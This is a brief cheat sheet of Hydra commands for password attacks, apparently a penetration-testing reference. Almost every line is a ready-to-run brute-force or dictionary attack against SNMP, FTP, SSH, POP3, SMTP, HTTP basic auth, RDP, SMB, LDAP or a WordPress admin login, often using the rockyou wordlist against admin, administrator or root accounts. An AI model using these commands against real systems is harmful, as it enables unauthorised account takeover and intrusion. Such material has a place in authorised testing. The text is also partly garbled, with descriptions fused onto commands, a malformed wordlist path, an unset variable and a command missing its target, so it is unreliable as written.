Hydra Password Cracking Cheetsheet

The following table uses the $ip variable which can be set with the following command:

export ip

hydra -P password-file.txt -v $ip snmpHydra brute force against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftpHydra FTP known user and rockyou password list
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip sshHydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -p "known password" -t 1 -u $ip sshHydra SSH using a known password and a username list
hydra $ip -s 22 ssh -l $user -P big_wordlist.txtHydra SSH Against Known username on port 22
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -VHydra POP3 Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -VHydra SMTP Brute Force
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /adminHydra attack http get 401 login with a dictionary
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ipHydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smbHydra brute force SMB user with rockyou:
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'Hydra brute force a Wordpress admin login
hydra -L usernames.txt -P passwords.txt $ip smb -V -fSMB Brute Forcing
hydra -L users.txt -P passwords.txt $ip ldap2 -V -fLDAP Brute Forcing


hydra -l root -P /usr/share/wordlists/rockyou.txt -t 4 ssh